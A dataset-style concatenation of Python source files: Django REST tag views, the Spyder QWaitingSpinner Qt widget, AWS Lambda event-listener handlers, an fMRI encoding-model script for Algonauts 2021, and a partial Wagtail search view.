context={'request': request}
)
return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
if request.method == 'POST':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=pk
)
if tag.autor != request.user:
return Response(
status=status.HTTP_404_NOT_FOUND
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
serializer = GlobalyTagsSerializer(
tag,
context={'request': request}
)
return Response(serializer.data)
return Response(
status=status.HTTP_204_NO_CONTENT
)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
if request.method == 'POST':
serializer = GlobalyTagsSerializer(
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save(autor=request.user)
return Response(serializer.data)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
if request.method == 'PUT' or request.method == 'DELETE':
try:
pk = request.data.get('id')
tag = GlobalyTags.objects.get(
pk=int(pk)
)
except GlobalyTags.DoesNotExist:
return Response(
status=status.HTTP_404_NOT_FOUND
)
if request.method == 'PUT':
serializer = GlobalyTagsSerializer(
tag,
data=request.data,
context={'request': request}
)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
if request.method == 'DELETE':
tag.delete()
return Response(
status=status.HTTP_204_NO_CONTENT
)
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
| true | true |
f719265545a7052a735de005b48163850981877d | 8,764 | py | Python | spyder/widgets/waitingspinner.py | suokunlong/spyder | 2d5d450fdcef232fb7f38e7fefc27f0e7f704c9a | [
"MIT"
] | 3 | 2019-09-27T21:00:00.000Z | 2021-03-07T23:28:32.000Z | spyder/widgets/waitingspinner.py | jastema/spyder | 0ef48ea227c53f57556cd8002087dc404b0108b0 | [
"MIT"
] | 3 | 2020-10-13T21:15:23.000Z | 2020-10-13T21:15:24.000Z | spyder/widgets/waitingspinner.py | jastema/spyder | 0ef48ea227c53f57556cd8002087dc404b0108b0 | [
"MIT"
] | 2 | 2021-04-30T01:18:22.000Z | 2021-09-19T06:31:42.000Z | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2012-2014 Alexander Turkin
Copyright (c) 2014 William Hallatt
Copyright (c) 2015 Jacob Dawid
Copyright (c) 2016 Luca Weiss
Copyright (c) 2017- Spyder Project Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
See NOTICE.txt in the Spyder repository root for more detailed information.
Minimally adapted from waitingspinnerwidget.py of the
`QtWaitingSpinner Python Fork <https://github.com/z3ntu/QtWaitingSpinner>`_.
A port of `QtWaitingSpinner <https://github.com/snowwlex/QtWaitingSpinner>`_.
"""
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
# super().__init__(parent)
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
# WAS IN initialize()
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
# END initialize()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
# Compute the scaling factor to apply to the size and thickness
# of the lines in the trail.
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
"""
Return whether the length and thickness of the trailing lines
are decreasing.
"""
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
def setRoundness(self, roundness):
self._roundness = max(0.0, min(100.0, roundness))
def setColor(self, color=Qt.black):
self._color = QColor(color)
def setRevolutionsPerSecond(self, revolutionsPerSecond):
self._revolutionsPerSecond = revolutionsPerSecond
self.updateTimer()
def setTrailFadePercentage(self, trail):
self._trailFadePercentage = trail
def setTrailSizeDecreasing(self, value):
"""
Set whether the length and thickness of the trailing lines
are decreasing.
"""
self._trailSizeDecreasing = value
def setMinimumTrailOpacity(self, minimumTrailOpacity):
self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
def updateSize(self):
size = int((self._innerRadius + self._lineLength) * 2)
self.setFixedSize(size, size)
def updateTimer(self):
self._timer.setInterval(int(1000 / (self._numberOfLines *
self._revolutionsPerSecond)))
def updatePosition(self):
if self.parentWidget() and self._centerOnParent:
self.move(int(self.parentWidget().width() / 2 -
self.width() / 2),
int(self.parentWidget().height() / 2 -
self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
color = QColor(colorinput)
if countDistance == 0:
return color
minAlphaF = minOpacity / 100.0
distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
if countDistance > distanceThreshold:
color.setAlphaF(minAlphaF)
else:
alphaDiff = color.alphaF() - minAlphaF
gradient = alphaDiff / float(distanceThreshold + 1)
resultAlpha = color.alphaF() - gradient * countDistance
# If alpha is out of bounds, clip it.
resultAlpha = min(1.0, max(0.0, resultAlpha))
color.setAlphaF(resultAlpha)
return color
| 34.368627 | 105 | 0.655294 |
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
def setRoundness(self, roundness):
self._roundness = max(0.0, min(100.0, roundness))
def setColor(self, color=Qt.black):
self._color = QColor(color)
def setRevolutionsPerSecond(self, revolutionsPerSecond):
self._revolutionsPerSecond = revolutionsPerSecond
self.updateTimer()
def setTrailFadePercentage(self, trail):
self._trailFadePercentage = trail
def setTrailSizeDecreasing(self, value):
self._trailSizeDecreasing = value
def setMinimumTrailOpacity(self, minimumTrailOpacity):
self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
def updateSize(self):
size = int((self._innerRadius + self._lineLength) * 2)
self.setFixedSize(size, size)
def updateTimer(self):
self._timer.setInterval(int(1000 / (self._numberOfLines *
self._revolutionsPerSecond)))
def updatePosition(self):
if self.parentWidget() and self._centerOnParent:
self.move(int(self.parentWidget().width() / 2 -
self.width() / 2),
int(self.parentWidget().height() / 2 -
self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
color = QColor(colorinput)
if countDistance == 0:
return color
minAlphaF = minOpacity / 100.0
distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
if countDistance > distanceThreshold:
color.setAlphaF(minAlphaF)
else:
alphaDiff = color.alphaF() - minAlphaF
gradient = alphaDiff / float(distanceThreshold + 1)
resultAlpha = color.alphaF() - gradient * countDistance
resultAlpha = min(1.0, max(0.0, resultAlpha))
color.setAlphaF(resultAlpha)
return color
| true | true |
f71926594989831bd3fe9b4bdf47da2f462f2958 | 91 | py | Python | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | 1 | 2019-03-21T03:06:29.000Z | 2019-03-21T03:06:29.000Z | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | null | null | null | app/main/__init__.py | gichimux/news_highlight_0.1 | c085db3b80944bc18960b4896c7cb8d2a15bd305 | [
"MIT"
] | 1 | 2020-04-03T02:36:34.000Z | 2020-04-03T02:36:34.000Z | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors | 18.2 | 34 | 0.769231 | from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors | true | true |
f7192710ad408630f6ee5b7d502e00787c41b0a8 | 2,222 | py | Python | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | event_pubsub/handlers/event_listener_handlers.py | anandrgitnirman/snet-marketplace-service | f31bf741094476b9cb26277f1165deb2856257b1 | [
"MIT"
] | null | null | null | import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events() | 42.730769 | 112 | 0.860036 | import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events() | true | true |
f71927526b4a5695020b5b175570366eb0a2f1d0 | 6,086 | py | Python | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | 2 | 2021-08-03T15:07:04.000Z | 2022-03-02T15:10:07.000Z | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | 8 | 2021-08-04T14:21:14.000Z | 2021-08-16T21:07:12.000Z | analysis/baseline/s02_perform_encoding.py | eduardojdiniz/Buzznauts | 8ac242a8d5309b4090a0f0b148ec275cac762bc0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
# Here as an example we use first 900 videos as training and rest of
# the videos as validation
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
# result visualization for whole brain (full_track)
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| 38.518987 | 79 | 0.544857 |
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| true | true |
f719275c0f8f28584e41df42235876facf663976 | 2,395 | py | Python | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | ayewa/views.py | JoanEliot/ayewa | e36128357564cb83938b2d7096b3fe75330dc948 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
# Search
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
# In production, use ElasticSearch and a simplified search query, per
# http://docs.wagtail.io/en/v1.12.1/topics/search/backends.html
# like this:
search_results = Page.objects.live().search(search_query)
else:
# If we aren't using ElasticSearch for the demo, fall back to native db search.
# But native DB search can't search specific fields in our models on a `Page` query.
# So for demo purposes ONLY, we hard-code in the model names we want to search.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
# Record hit
query.add_hit()
else:
search_results = Page.objects.none()
# Pagination
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| 39.916667 | 100 | 0.681002 | from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
search_results = Page.objects.live().search(search_query)
else:
# But native DB search can't search specific fields in our models on a `Page` query.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
